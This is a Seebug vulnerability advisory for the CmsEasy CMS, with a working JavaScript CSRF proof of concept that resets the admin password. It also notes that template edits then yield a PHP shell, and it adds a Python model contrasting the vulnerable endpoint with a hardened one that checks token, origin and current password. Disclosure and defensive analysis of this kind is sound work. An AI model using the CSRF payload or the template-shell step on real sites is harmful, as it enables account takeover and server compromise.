CmsEasy site-building system: CSRF to obtain admin privileges, then backend getshell

2014-08-07T00:00:00
ID SSV:94068
Type seebug
Reporter Root
Modified 2014-08-07T00:00:00

Description

Brief description:

CmsEasy site-building system: CSRF to obtain admin privileges, then backend getshell

Details:

A CSRF vulnerability exists in the admin password change function. Request:

http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default

POST body:

onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4

The admin password can be changed via CSRF:

```
// Build an XMLHttpRequest object (with the legacy ActiveX fallback).
function ajax(){
    var request = false;
    if(window.XMLHttpRequest) {
        request = new XMLHttpRequest();
    } else if(window.ActiveXObject) {
        var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
                        'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
                        'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
        for(var i=0; i<versions.length; i++) {
            try { request = new ActiveXObject(versions[i]); } catch(e) {}
        }
    }
    return request;
}

var _x = ajax();
postgo();

// Submit the password-change form to the user-edit endpoint.
function postgo() {
    src="http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default";
    data="onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4";
    xhr_act("POST",src,data);
}

// Synchronous XHR helper; the form-encoded body is sent with the browser's cookies.
function xhr_act(_m,_s,_a){
    _x.open(_m,_s,false);
    cookie = document.cookie;
    if(_m=="POST"){
        _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        _x.setRequestHeader("Cookie",cookie);
    }
    _x.send(_a);
    return _x.responseText;
}
```
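The root cause in the report is that the user-edit endpoint honours any POST that carries the admin's session cookie, which the browser attaches automatically to a cross-site form submission. The following added example (not CmsEasy code) models that endpoint in Python with the vulnerable behaviour beside a hardened version that checks the `Origin`/`Referer` header, a per-session anti-CSRF token, and the current password before accepting a credential change. The cookie name `PHPSESSID`, the origins, the form field names `csrf_token` and `password_current`, and the passwords are all constructed for the simulation.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Assumed site origin (the report's PoC targets http://localhost/cmseasy/...)
SITE_ORIGIN = "http://localhost"
ATTACKER_ORIGIN = "http://attacker.invalid"  # constructed origin for the simulation


@dataclass
class Request:
    method: str
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


class Server:
    """Toy model of the user-edit endpoint (case=table&act=edit&table=user)."""

    def __init__(self):
        self.secret = secrets.token_bytes(32)
        self.sessions = {}                      # session id -> username
        self.passwords = {"admin": "original-admin-password"}  # constructed

    def login(self, username):
        sid = secrets.token_hex(16)
        self.sessions[sid] = username
        return sid

    def csrf_token(self, sid):
        # Synchronizer token bound to the session, derived under a server secret.
        return hmac.new(self.secret, sid.encode(), hashlib.sha256).hexdigest()

    def _session_user(self, req):
        return self.sessions.get(req.cookies.get("PHPSESSID"))

    def edit_user_vulnerable(self, req):
        # Behaviour described in the report: any authenticated POST is honoured,
        # so a cross-site submission that rides on the admin's cookie succeeds.
        user = self._session_user(req)
        if req.method != "POST" or user is None:
            return 403
        self.passwords[req.form["username"]] = req.form["passwordnew"]
        return 200

    def edit_user_hardened(self, req):
        user = self._session_user(req)
        if req.method != "POST" or user is None:
            return 403
        # 1. Reject requests whose Origin (or Referer) is not this site.
        origin = req.headers.get("Origin") or req.headers.get("Referer", "")
        if not origin.startswith(SITE_ORIGIN):
            return 403
        # 2. Require the per-session anti-CSRF token, compared in constant time.
        expected = self.csrf_token(req.cookies["PHPSESSID"])
        if not hmac.compare_digest(req.form.get("csrf_token", ""), expected):
            return 403
        # 3. Credential changes re-prompt for the current password.
        if req.form.get("password_current") != self.passwords.get(user):
            return 403
        self.passwords[req.form["username"]] = req.form["passwordnew"]
        return 200


def forged_request(sid):
    """Request as the admin's browser would send it from a third-party page:
    the session cookie is attached automatically, the Origin is the other
    site, and no anti-CSRF token is present."""
    return Request("POST", {"PHPSESSID": sid},
                   {"username": "admin", "passwordnew": "456456"},
                   {"Origin": ATTACKER_ORIGIN})


def legitimate_request(server, sid, current_password):
    """Request from the CMS's own password form, token and current password included."""
    return Request("POST", {"PHPSESSID": sid},
                   {"username": "admin", "passwordnew": "new-admin-password",
                    "csrf_token": server.csrf_token(sid),
                    "password_current": current_password},
                   {"Origin": SITE_ORIGIN})


def simulate():
    """Run the forged request against both handlers and a legitimate one
    against the hardened handler; return the statuses and resulting passwords."""
    results = {}
    vuln = Server()
    sid = vuln.login("admin")
    results["vulnerable_status"] = vuln.edit_user_vulnerable(forged_request(sid))
    results["vulnerable_password"] = vuln.passwords["admin"]

    hard = Server()
    sid = hard.login("admin")
    results["hardened_forged_status"] = hard.edit_user_hardened(forged_request(sid))
    results["hardened_password_after_forgery"] = hard.passwords["admin"]
    legit = legitimate_request(hard, sid, hard.passwords["admin"])
    results["hardened_legit_status"] = hard.edit_user_hardened(legit)
    results["hardened_password_after_legit"] = hard.passwords["admin"]
    return results


if __name__ == "__main__":
    for key, value in simulate().items():
        print(f"{key}: {value}")
```

The three checks are independent layers: the token check is the one that actually closes the CSRF hole, the Origin check is cheap defence in depth against misconfigured or older clients, and re-prompting for the current password means that even a forged request that somehow obtained a token cannot rotate the admin credential.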

Once logged in to the backend, editing a template and inserting PHP code yields a shell.

Proof of vulnerability:

<img src="https://images.seebug.org/upload/201408/071655212230bde338ce0e10c040a13194325114.jpg" alt="0.jpg" width="600">

<img src="https://images.seebug.org/upload/201408/07165534389772af43d107660645d01df58e5090.jpg" alt="1.jpg" width="600">